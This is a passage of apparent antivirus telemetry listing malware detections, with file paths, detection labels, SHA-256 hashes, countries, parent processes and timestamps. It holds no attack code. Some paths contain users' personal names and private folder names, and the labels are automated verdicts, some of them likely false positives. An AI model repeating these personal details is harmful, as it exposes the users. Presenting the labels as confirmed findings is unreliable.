  Row(detection=Row(filename='getdiskserial.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\GetDiskSerial.exe", filesize=64000, name='TR/Siggen.psvbr.#M1.#R1'), hash='bc0a114c0973d821f584a672f3d2c3b951288a0e721901ada7bd47acea4cdd2d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hrl191.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl191.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b111', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b111', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:10:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vip_005_setup.exe', filepath='\\\\?\\C:\\Program Files (x86)\\vip_005_setup\\vip_005_setup.exe', filesize=4708000, name='HEUR/AGEN.1019074.#M1.#R1'), hash='fd008bdfa51be94b79b83a06b0630a3c919734ee1f7c796b3e0d47a66e0bdf4d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:30:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='biên bản thi đua cả năm.exe', filepath='G:\\\xa0\\NGUYEN Ổ C\\Biên bản thi đua cả năm.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='c829f0471fd190f70d78fed3b4c56e3306cae681025cefafefe6036d572695f6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T11:19:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214954-2e8ec270', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-214954-2E8EC270', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:50:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-11-04-170650/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:41:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-114942-4837c0d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68da91b9\\AVSCAN-20181104-114756-39602EE4\\AVSCAN-20181104-114942-4837C0D0', filesize=10304000, name='Adware/Adware.543562.#M1.#R1'), hash='aeaaa560e95d54a6ed2392d59898f295f6e9368bc9b8c1d8f537b79f4c3dc798', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:18:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b679adc73537cac493714a2bc863442581f7031eb7819e044825f7bc60dea86f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B679ADC73537CAC493714A2BC863442581F7031EB7819E044825F7BC60DEA86F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b679adc73537cac493714a2bc863442581f7031eb7819e044825f7bc60dea86f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:38:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140250-f2842ae7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140250-F2842AE7', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='db4a5b29d52096cc2cb145cdeb802389c5c91d31d49602f37914095d4a5b4237', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296fb4', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296fb4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:38:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292280', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292280', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:06:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsnE2B2.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T13:45:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-033458-070a5ba5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eeca9933\\AVSCAN-20181105-033356-D1C09BF3\\AVSCAN-20181105-033458-070A5BA5', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:34:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='$r6q6ust.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-51707995-2256450374-1484956166-1001\\$R6Q6UST.exe', filesize=384000, name='DR/Delphi.Gen.#M300.#R273'), hash='fe4029696947def84af9e7b0df0557224dd01413779c35c1cd51941193ffa789', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4473304, timestamp='2018-11-04T08:07:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T10:03:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cttunesvr.exe', filepath='\\\\?\\C:\\Windows\\System32\\cttunesvr.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='fcfc777ded4da2b405a0b7017de2cd22d9e6e6787a295f7c5704605dad5f6814', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fb35cffc8d58a245c149d5f9dbc29144a86ba1116cd3730149a53ad860d63cbe', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FB35CFFC8D58A245C149D5F9DBC29144A86BA1116CD3730149A53AD860D63CBE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fb35cffc8d58a245c149d5f9dbc29144a86ba1116cd3730149a53ad860d63cbe', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:44:24Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe985_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe985 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T03:31:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T05:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vctxd.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\VCTXD\\VCTXD.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='39937865052cb558fe82b0851e6c2a2d094007dd9fdbbd4904c79cca4a4d95a6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102007-9e130b15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b7cae0b0\\AVSCAN-20181102-101953-9C0832BF\\AVSCAN-20181102-102007-9E130B15', filesize=3484000, name='TR/Bandios.ulkkx.#M1.#R1'), hash='16159b5fe91e89cc5ef9bbac6ef6ff8a1d4f4b7ce00b1b0195e5f7fda9329853', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:17:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='atube_catcher_2506595951.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\aTube_Catcher_2506595951.exe', filesize=2460000, name='PUA/InstallCore.#M1.#R1'), hash='62baa352039830f5fd30eb37497b849a646d678db29466333ac2a0c43fdda658', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\AVIRA\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T14:15:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='هوكى الجليد.exe', filepath='E:\\حسين حسن\\برنامج الأحلام\\بارا الفراعنه\\العاب خفيفة\\لعاب اطفال\\هوكى الجليد.exe', filesize=384000, name='W32/Virut.Gen.#M1.#R1'), hash='17cf7f3cbbee1129896e997381cb05183d445cae148d680be2dccd08840116c7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T10:23:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T01:44:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe294_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe294 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T09:39:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='планирование 2017.bat', filepath='G:\\планирование 2017\\планирование 2017.bat', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='3d862099d9b548aa505eb39cab9fd8061c0c600a45bce604df67abbef4498314', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-02T09:40:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190025-5e6b2cce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d5ec04e\\AVSCAN-20181102-185412-19B88F55\\AVSCAN-20181102-190025-5E6B2CCE', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:00:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='59d42f667f52e4572ae41eba26f810867c3a9b041622fb5bbbc5818e8f6f7fe8', metadata=Row(cmdline='-k secsvcs', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T15:30:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T01:45:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T22:17:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbeachw.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\NBEACHW\\NBEACHW.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pbxcyfjc.exe', filepath='H:\\RECYCLER\\S-0-3-72-3101430030-5584247583-867414287-5172\\PBxCYfJc.exe', filesize=256000, name='W32/Ramnit.C.#M1.#R1'), hash='6c2a846614886f002a52f5b941096d4ab1014144e16848a777cfd1333ef46cdf', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:31:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_default.pif:mupygh', filepath='E:\\alte Sicherungen allgemein 27.08.2011\\alteSachen\\altercomp\\WINDOWS\\_default.pif:mupygh', filesize=64000, name='TR/Lefeat.DLL1.#M1.#R1'), hash='2c1b2010dddfa99a40da5cee2b70bb72bacb274c692b7e53e3aac2360c759311', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T15:44:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190511-92eb78cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d5ec04e\\AVSCAN-20181102-185412-19B88F55\\AVSCAN-20181102-190511-92EB78CB', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:05:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153402-21702e56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8475873b\\AVSCAN-20181102-153322-1B9FEE38\\AVSCAN-20181102-153402-21702E56', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='43fa6631f316912f69f3ac21abfb372d5d51c6cb971cf245ac9fa9e4a7364b4b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='19780a1f.vbt', filepath='C:\\Program Files\\Spyware Doctor\\avdb\\temp\\19780A1F.vbt', filesize=2048000, name='TR/Crypt.XPACK.Gen.#M300.#R3174'), hash='02336aab184a9fb445de08399fd4d3d06628bf43471242143768393271534cb0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Spyware Doctor\\pctsSvc.exe', parentsize=1095560, timestamp='2018-11-02T17:30:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flash_update.exe', filepath='C:\\Users\\X\\Downloads\\flash_update.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0db8d2133327b4b22206fee7412826e1843df743358048be655c045258de3207', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2391280, timestamp='2018-11-02T20:18:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c4f8770d08a4d70d44fefa5205045151274c81ccab9e3d90f26b7f641561ebf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C4F8770D08A4D70D44FEFA5205045151274C81CCAB9E3D90F26B7F641561EBF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1c4f8770d08a4d70d44fefa5205045151274c81ccab9e3d90f26b7f641561ebf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 